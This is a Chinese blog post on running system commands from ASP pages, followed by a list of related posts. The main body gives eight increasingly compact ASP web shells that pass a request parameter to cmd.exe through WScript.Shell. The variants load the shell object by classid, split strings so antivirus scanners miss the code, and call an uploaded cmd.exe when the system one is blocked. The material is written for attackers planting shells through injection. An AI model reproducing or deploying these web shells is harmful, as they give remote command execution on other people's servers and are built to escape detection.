asp执行cmd实例

最新推荐文章于 2024-08-13 20:47:30 发布
最新推荐文章于 2024-08-13 20:47:30 发布
阅读量9.1k 收藏 3
点赞数
分类专栏: web 文章标签: asp cmd
第一个,来看zzzeva免fso的cmd.asp
代码如下:<form method="post">
<input type=text name="cmd" size=60>
<input type=submit value="run"></form>
<textarea readonly cols=80 rows=20>
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c "&request.form("cmd")).stdout.readall%>
</textarea>
是不是觉得有点长了?在注入时写有点不好写。那来改一下。
第二个,更改zzzeva免fso的cmd.asp
代码如下:

<textarea readonly cols=80 rows=20>
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c "&request("cmd")).stdout.readall%>

用法是xx.asp?cmd=net user
这样是为了得到结果排得方便,其实如果不为美观,还可以更短,那来第三个
第三个,缩短的cmd.asp

<%response.write server.createobject("wscript.shell").exec("cmd.exe /c "&request("cmd")).stdout.readall%>

这里用了response.write,变量用了cmd。为什么不更短呢?
第四个,更短的cmd.asp

<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>

好像这就是最短的了。除了短,我们还要在别的地方下功夫。
第五个,wscript.shell被改名怎么办?
代码:

<ObjEct runat=sErvEr iD=kk scOpE=pagE classiD="clsiD:72C24DD5-D70A-438B-8A42-98424B88AFB8"></ObjEct>
<%=kk.exec("cmd /c "+request("cmd")).stdout.readall%>

当然,classid值在不同系统下有所不同。这个要自行更改

第六个,被一些杀asp木马的软件检测出来怎么办?
把变量拆开呀。代码:

<%=server.createobject("ws"+"cript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>



<%=server.createobject("ws"&"cript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>

这里代码引号里的东东都可以随便拆的,像还可以拆成

<%=server.createobject("ws"&"cript.shell").exec("c"&"md.exe /c "&request("c")).stdout.readall%>

第7个,cmd.exe不让调用怎么办?
这个你自己上传一个cmd.exe,放在一个可以调用的目录下,代码更改如下:

<%=server.createobject("wscript.shell").exec("e:\aspx\cmD.EXE /c "&request("c")).stdout.readall%>
第8个,asp代码可以加密吗?
当然可以了
woswod
关注
专栏目录
asp.net环境下的cmd命令执行
lake2的专栏
08-03 4015
cmd.asp木马大家一定用过吧。这是一个可以执行cmd命令的asp文件(不过要被杀毒软件追杀^_^)。其原理是用WSCRIPT.SHELL对象调用cmd.exe,然后把返回的信息放到一个临时文件,再利用FSO把临时文件信息读出来显示在浏览器里。 呵呵,在asp.net环境下也是可以写出类似程序的。不过可以不用那些对象。 VB.net里有一个shell函数,可以执行外部程序。呵呵,就是利用它!现看
ASP Shell执行命令小技巧 .doc
12-22
ASP Shell执行命令小技巧 .doc
aspx命令执行小马
最新发布
2301_77012231的博客
08-13 177
【代码】aspx命令执行小马。
用VB编写一个可以在ASP环境下调用的运行CMD命令的组件
程序设计与安全 @EVAN-CSS
08-30 1915
有时我们在管理服务器时为了安全起见会禁用Windows Scripting Host,这样能防止某些不法用户利用WSH生成一个WebShell,对服务器造成很大的安全隐患。但如果我们又想禁用WSH,又想使用自己的WebShell用于服务器的管理怎么办呢?这里介绍了一种实现ASP中运行CMD并显示结果的组件编程。希望对大家能有所帮助。首先我们新建一个ActiveDLL工程,命名为ASPCMD,新
asp.net执行cmd命令
gzeehg007的博客
06-13 3128
IIS中执行时,可能会有权限问题,应用程序池》高级设置》进程模型》标识  设置用户名和密码 protected void Button1_Click(object sender, EventArgs e)     {         Response.Write(ExeCommand("d:\\qt-faststart.exe d:\\11.mp4 d:\\88.mp4")); 
asp.net执行cmd命令(包括第三方应用的命令行)
dingzuogun1518的博客
11-03 264
Process p = new Process(); p.StartInfo.FileName = "cmd.exe"; p.StartInfo.UseShellExecute = false; p.StartInfo.RedirectStandardInput = true; p.StartInfo.RedirectStandardOutput = true; p.S...
asp.net调用dos命令~(通过cmd执行)---转载的
dawang2006的专栏
09-10 2116
private void Button1_Click(object sender, System.EventArgs e)  {     CallExe( @"md c:/wxd" );   //这里用了@的话,可以不用写成C://wxd了   }  private void CallExe(string argm)  {   Process p = new Process();    p.Sta
ASP.Net执行cmd命令的实现代码
10-28
1. 创建Process对象实例:首先,创建一个Process对象,之后将通过这个对象来启动cmd进程。 2. 配置ProcessStartInfo:使用Process对象的StartInfo属性来配置启动进程时的参数。其中,FileName属性设置为"cmd.exe",...
asp执行带参数的sql语句实例
10-25
在给定的代码实例中,我们可以看到如何在ASP中使用ADODB对象来执行带有参数的SQL查询。首先,创建一个`ADODB.Connection`对象来建立与数据库的连接。这里的连接字符串使用了Microsoft Jet OLEDB 4.0提供程序,指向了...
ASP实例开发源码-批量生成HTML实例程序.zip
11-16
2. 执行查询:创建SQL查询语句,通过Cmd对象执行,获取所需数据。 3. 遍历数据:使用Recordset对象遍历查询结果。 4. 生成HTML:在循环中,将每条数据插入预定义的HTML模板中,形成新的HTML文件。 5. 写入文件:使用...
ASP直接存取ACCESS数据库实例.rar_asp帮助
09-19
实例将详细介绍如何利用ASP直接与ACCESS数据库进行交互,以实现数据的读取、写入和更新等操作。 首先,我们需要在ASP页面中引入ADO(ActiveX Data Objects),这是微软提供的一个用于访问数据库的标准接口。在ASP...
asp木马中的cmd执行
liswa 电脑备忘录
03-24 3452
        以前一直看不懂asp木马中的cmd命令执行。当时如果默认的系统是有可执行属性的话,肯定是不必修改,直接在命令行中写入命令即可,但是如果对方系统的cmd是没有权限的,这时需要我们上传一个cmd.exe上去,放置在可执行的目录下,再在asp木马中制定cmd.exe来执行,这时我就有点困惑了,因为它上面有可几个地方,一个说是路径,一个说是参数,一个说是命令(asp站长助手中只有路径和命令
cmd.asp [自定cmd.exe地址]
FreeXploiT
10-28 1873
本文作者:lcx文章出处:未知文章性质:原创阅读次数:28发布日期:2004-10-24  end if %> if request("cmdx")="cmd.exe地址,可更改可默认" then response.write oScriptlhn.exec("cmd.exe /c"&request("cmd")).stdout.readall end i
可以执行系统命令的ASP原码放送
weixin_30469895的博客
10-31 133
注意的是,程序运行必须有FileSystemObject支持。以下是远程执行命令的原代码。  copy下来另存为execute.asp.  <html>  <head>  <meta http-equiv="Content-Language" content="zh-cn">  <meta http-equiv="Content-Type" content="text/html; cha...
asp执行dos命令的方法及原理
m0_68479320的博客
04-05 302
ASP执行dos,ASP执行dos命令,ASP执行dos程序,ASP执行dos并显示读取,ASP执行dos返回回显。
[导入]ASP常用函数:Exec()
weixin_34416649的博客
03-16 201
<%'功能:执行SQL语句'来源:http://jorkin.reallydo.com/article.asp?id=487Public Function Exec(sCommand)On Error Resume NextOpenConn()Set Exec = oConn.Execute(sCommand)If Err ThenWriteL...
74.网络安全渗透测试—[SQL注入篇13]—[SQLSERVER+ASP-执行系统命令]
qwsn
01-19 2796
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、SQLSERVER+ASP 执行系统命令 1、前言 2、SQLSERVER+ASP 执行系统命令示例
asp 使用aspexec组件执行 exe
KylinBL的专栏
03-26 3497
http://hi.baidu.com/kk126/blog/item/e44b6b27afc50407918f9d17.html http://www.ly705.cn/blog/archives/20071228/93.html http://www.lilu.name/Html/diannaojishu/2008-7/962025.html aspexe.dll文件
asp.net 实现登陆实例
06-02
以下是一个简单的ASP.NET登录示例: 1. 在Visual Studio中创建一个新的ASP.NET Web应用程序项目。 2. 在项目中添加一个Web表单(.aspx文件)和一个代码文件(.aspx.cs文件)。 3. 在Web表单上添加用户名和密码输入框以及一个登录按钮。 4. 在代码文件中添加以下代码: ``` using System; using System.Data.SqlClient; public partial class Login : System.Web.UI.Page { protected void Page_Load(object sender, EventArgs e) { } protected void btnLogin_Click(object sender, EventArgs e) { string username = txtUsername.Text; string password = txtPassword.Text; SqlConnection con = new SqlConnection("Data Source=your_server_name;Initial Catalog=your_database_name;Integrated Security=True"); SqlCommand cmd = new SqlCommand("SELECT COUNT(*) FROM Users WHERE Username=@username AND Password=@password", con); cmd.Parameters.AddWithValue("@username", username); cmd.Parameters.AddWithValue("@password", password); con.Open(); int count = (int)cmd.ExecuteScalar(); con.Close(); if (count > 0) { Response.Redirect("Home.aspx"); } else { lblError.Text = "Invalid username or password"; } } } ``` 5. 将服务器名称和数据库名称替换为您自己的服务器和数据库名称。 6. 运行应用程序并测试登录功能。 该示例使用了一个简单的数据库表(Users),其中包含用户名和密码字段。在登录按钮上点击时,代码将从数据库中检索相应的用户名和密码,并将其与用户输入进行比较。如果匹配,则用户将被重定向到主页。否则,将显示错误消息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值